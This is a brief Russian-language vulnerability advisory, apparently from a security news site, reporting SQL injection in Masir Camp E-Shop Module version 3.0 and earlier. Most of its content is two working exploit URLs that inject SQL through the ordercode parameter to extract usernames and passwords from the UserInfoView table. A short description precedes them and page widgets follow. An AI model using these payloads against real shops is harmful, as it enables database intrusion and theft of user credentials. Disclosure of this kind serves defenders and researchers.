Программа: Masir Camp E-Shop Module <= 3.0

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения.

Эксплоит:

http://[URL]/?page=veiworderstatus&ordercode=foo' or 1=(select top 1 UserName
from UserInfoView)--

http://[URL]/?page=veiworderstatus&ordercode=foo' or 1=(select top 1 Password
from UserInfoView)--

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии